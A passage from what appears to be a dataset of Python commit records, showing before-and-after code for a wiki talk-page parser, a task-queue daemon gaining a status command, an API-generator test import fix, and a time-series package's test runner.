headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
<commit_msg>Switch to flat sections to avoid double including subsections<commit_after>import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections(flat=True)
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
|
f35c6f989129d6298eb2f419ccb6fe8d4c734fd6
|
taskq/run.py
|
taskq/run.py
|
import time
import transaction
from taskq import models
from daemon import runner
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = runner.DaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
|
import time
import transaction
from daemon import runner
from taskq import models
class TaskDaemonRunner(runner.DaemonRunner):
def _status(self):
pid = self.pidfile.read_pid()
message = []
if pid:
message += ['Daemon started with pid %s' % pid]
else:
message += ['Daemon not running']
tasks = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).all()
message += ['Number of waiting tasks: %s' % len(tasks)]
runner.emit_message('\n'.join(message))
action_funcs = {
u'start': runner.DaemonRunner._start,
u'stop': runner.DaemonRunner._stop,
u'restart': runner.DaemonRunner._restart,
u'status': _status,
}
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = TaskDaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
|
Add status to the daemon
|
Add status to the daemon
|
Python
|
mit
|
LeResKP/sqla-taskq
|
import time
import transaction
from taskq import models
from daemon import runner
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = runner.DaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
Add status to the daemon
|
import time
import transaction
from daemon import runner
from taskq import models
class TaskDaemonRunner(runner.DaemonRunner):
def _status(self):
pid = self.pidfile.read_pid()
message = []
if pid:
message += ['Daemon started with pid %s' % pid]
else:
message += ['Daemon not running']
tasks = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).all()
message += ['Number of waiting tasks: %s' % len(tasks)]
runner.emit_message('\n'.join(message))
action_funcs = {
u'start': runner.DaemonRunner._start,
u'stop': runner.DaemonRunner._stop,
u'restart': runner.DaemonRunner._restart,
u'status': _status,
}
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = TaskDaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
|
<commit_before>import time
import transaction
from taskq import models
from daemon import runner
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = runner.DaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
<commit_msg>Add status to the daemon<commit_after>
|
import time
import transaction
from daemon import runner
from taskq import models
class TaskDaemonRunner(runner.DaemonRunner):
def _status(self):
pid = self.pidfile.read_pid()
message = []
if pid:
message += ['Daemon started with pid %s' % pid]
else:
message += ['Daemon not running']
tasks = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).all()
message += ['Number of waiting tasks: %s' % len(tasks)]
runner.emit_message('\n'.join(message))
action_funcs = {
u'start': runner.DaemonRunner._start,
u'stop': runner.DaemonRunner._stop,
u'restart': runner.DaemonRunner._restart,
u'status': _status,
}
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = TaskDaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
|
import time
import transaction
from taskq import models
from daemon import runner
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = runner.DaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
Add status to the daemonimport time
import transaction
from daemon import runner
from taskq import models
class TaskDaemonRunner(runner.DaemonRunner):
def _status(self):
pid = self.pidfile.read_pid()
message = []
if pid:
message += ['Daemon started with pid %s' % pid]
else:
message += ['Daemon not running']
tasks = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).all()
message += ['Number of waiting tasks: %s' % len(tasks)]
runner.emit_message('\n'.join(message))
action_funcs = {
u'start': runner.DaemonRunner._start,
u'stop': runner.DaemonRunner._stop,
u'restart': runner.DaemonRunner._restart,
u'status': _status,
}
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = TaskDaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
|
<commit_before>import time
import transaction
from taskq import models
from daemon import runner
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = runner.DaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
<commit_msg>Add status to the daemon<commit_after>import time
import transaction
from daemon import runner
from taskq import models
class TaskDaemonRunner(runner.DaemonRunner):
def _status(self):
pid = self.pidfile.read_pid()
message = []
if pid:
message += ['Daemon started with pid %s' % pid]
else:
message += ['Daemon not running']
tasks = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).all()
message += ['Number of waiting tasks: %s' % len(tasks)]
runner.emit_message('\n'.join(message))
action_funcs = {
u'start': runner.DaemonRunner._start,
u'stop': runner.DaemonRunner._stop,
u'restart': runner.DaemonRunner._restart,
u'status': _status,
}
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = TaskDaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
|
91d6503ebf3188a6e27058efcb10c0855df3542a
|
falafel/tests/test_api_generator.py
|
falafel/tests/test_api_generator.py
|
import unittest
from tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have a 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
|
import unittest
from falafel.tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have a 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
|
Fix failing API gen test
|
Fix failing API gen test
|
Python
|
apache-2.0
|
RedHatInsights/insights-core,RedHatInsights/insights-core
|
import unittest
from tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have a 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
Fix failing API gen test
|
import unittest
from falafel.tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have a 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
|
<commit_before>import unittest
from tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have a 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
<commit_msg>Fix failing API gen test<commit_after>
|
import unittest
from falafel.tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have a 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
|
import unittest
from tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have a 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
Fix failing API gen testimport unittest
from falafel.tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have a 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
|
<commit_before>import unittest
from tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have a 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
<commit_msg>Fix failing API gen test<commit_after>import unittest
from falafel.tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have a 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
|
5ed0474407669ebbca1e2a3f5a74ea3260bd3f2b
|
TimeSeriesTools/__init__.py
|
TimeSeriesTools/__init__.py
|
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Not inform about warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
# test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
|
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Not inform about warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
|
Add ts statistics to the tests module.
|
Add ts statistics to the tests module.
|
Python
|
mit
|
tgquintela/TimeSeriesTools,tgquintela/TimeSeriesTools
|
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Not inform about warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
# test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
Add ts statistics to the tests module.
|
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Not inform about warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
|
<commit_before>
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Not inform about warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
# test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
<commit_msg>Add ts statistics to the tests module.<commit_after>
|
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Not inform about warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
|
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Not inform about warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
# test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
Add ts statistics to the tests module.
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Not inform about warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
|
<commit_before>
__author__ = 'To\xc3\xb1o G. Quintela (tgq.spm@gmail.com)'
__version__ = '0.0.0'
#from pyCausality.TimeSeries.TS import *
#from pyCausality.TimeSeries.automatic_thresholding import *
#from pyCausality.TimeSeries.distances import *
#from pyCausality.TimeSeries.measures import *
#from pyCausality.TimeSeries.smoothing import *
#from pyCausality.TimeSeries.transformations import *
from tests import test_artificial_data
from tests import test_utils
from tests import test_measures
from tests import test_transformations
from tests import test_burstdetection
from tests import test_tsstatistics
from tests import test_regimedetection
from tests import test_feature_extraction
from tests import test_similarities
## Administrative information
import release
import version
## Not inform about warnings
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
warnings.simplefilter("ignore")
def test():
## Tests of modules
test_artificial_data.test()
# test_utils.test()
# test_measures.test()
test_transformations.test()
test_burstdetection.test()
# test_tsstatistics.test()
# test_regimedetection.test()
# test_feature_extraction.test()
# test_similarities.test()
<commit_msg>Add ts statistics to the tests module.<commit_after>
